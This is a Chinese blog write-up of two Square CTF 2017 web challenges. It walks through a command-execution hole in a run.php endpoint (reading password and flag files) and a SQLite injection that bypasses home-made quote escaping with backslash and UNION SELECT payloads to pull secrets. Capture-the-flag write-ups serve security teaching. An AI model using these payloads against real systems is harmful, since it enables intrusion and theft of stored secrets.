Chybeta

Square CTF 2017-Web-writeup

Password checker: 代码执行
Little Doggy Tables: SQL注入

Password checker 50

Task

1
https://nybas-berog-bitev-fuhyn-fehyt.capturethesquare.com/

Solution

查看源代码,发现有如下js:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<script type="text/javascript">
function validate(objForm) {
let toBeCheckedValue = objForm.elements['password'].value;
let xmlHttp = new XMLHttpRequest();
xmlHttp.open('GET', '/run.php?cmd=cat%20../password.txt', false);
xmlHttp.send(null);
let actualValue = xmlHttp.responseText;
if (toBeCheckedValue != actualValue) {
alert('Passwords don\'t match!');
} else {
alert('Password validated!');
}
}
</script>

访问:

1
https://nybas-berog-bitev-fuhyn-fehyt.capturethesquare.com//run.php?cmd=cat%20../password.txt

得到密码:password123 ,输进去后只是弹出一个提示框。

考虑命令执行,尝试查找flag:

1
https://nybas-berog-bitev-fuhyn-fehyt.capturethesquare.com/run.php?cmd=find / | grep flag

1
https://nybas-berog-bitev-fuhyn-fehyt.capturethesquare.com/run.php?cmd=cat /secrets/..109810_05_10_06_49_46.546032825/flag

得到flag:

1
flag-tyzyd-gateh-lefif-girav-bobut

另外读到run.php的源码:

1
2
3
4
<?php
$line = exec($_GET['cmd']);
echo $line;
?>

Little Doggy Tables 100

Task

1
2
3
4
5
6
7
8
9
10
"Oh, so you found it. Yes, it will tell you if a given agent is a dog or a cat, by looking up the appropriate value in its SQLite database. Good luck with that.
"Sure, the database contains some sensitive information, but our bulletproof firewall and top-notch quote escaping will ensure it never sees the light of day.
"Not secure? Huh? You don’t believe me? I’ll show you how secure. Here’s the source!"
USAGE EXAMPLE:
curl "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=Fido"
https://little-doggy-tables.capturethesquare.com

Solution

源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#!/usr/bin/env ruby
# author: Will McChesney <wmcc@squareup.com>
require "sqlite3"
require "webrick"
PORT = ARGV[0]
class SecureDatastore
include Singleton
def initialize
@db = SQLite3::Database.new("secure.db")
end
def secure_species_lookup(insecure_codename)
# roll our own escaping to prevent SQL injection attacks
secure_codename = insecure_codename.gsub("'", Regexp.escape("\\'"))
query = "SELECT species FROM operatives WHERE codename = '#{secure_codename}';"
puts query
results = @db.execute(query)
return if results.length == 0
results[0][0]
end
end
server = WEBrick::HTTPServer.new(Port: PORT)
trap("INT") { server.shutdown }
class AgentLookupServlet < WEBrick::HTTPServlet::AbstractServlet
def do_GET(request, response)
response.status = 200
response["Content-Type"] = "text/plain"
response.body = SecureDatastore.instance.secure_species_lookup(request.query["codename"]) + "\n"
end
end
server.mount "/agent_lookup", AgentLookupServlet
server.start

从题目的一大段描述,以及给出的源码来看应该是考察SQLite3注入。
关键在于下面这两句代码:

1
2
secure_codename = insecure_codename.gsub("'", Regexp.escape("\\'"))
query = "SELECT species FROM operatives WHERE codename = '#{secure_codename}';"

会将单引号' 通过正则替换成\'进行转义,来阻止我们闭合。但如果我们传入\',则在通过正则替换后会变成\\',其中第二个’\’是正则添加的,配合我们传入的\,会被转义,从而使我们的单引号逃逸。

在sqlite中,注释符为--,尝试访问:

1
https://little-doggy-tables.capturethesquare.com/agent_lookup?codename=\' or 1=1 --

则服务器端执行的数据库查询语句如下,注意\\

1
SELECT species FROM operatives WHERE codename = '\\' or 1=1 --';

单引号逃逸成功。

接下去考虑如何注出数据。

1
https://little-doggy-tables.capturethesquare.com/agent_lookup?codename=\' union select sql from sqlite_master limit 0,1--

说明operatives表里有三个字段:codename,species,secret 。

1
2
https://little-doggy-tables.capturethesquare.com/agent_lookup
?codename=\' union select secret from operatives limit 0,1--

直接提交不对。。。后面发现应该要改变limit。最后payload:

1
2
https://little-doggy-tables.capturethesquare.com/agent_lookup
?codename=\' union select secret from operatives limit 9,1--

flag:

1
flag-a3db5c13ff90a36963278c6a39e4ee3c22e2a436

微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】

本文标题:Square CTF 2017-Web-writeup

文章作者:chybeta

发布时间:2017年10月05日 - 20:10

最后更新:2017年10月05日 - 20:10

原始链接:http://chybeta.github.io/2017/10/05/Square-CTF-2017-Web-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。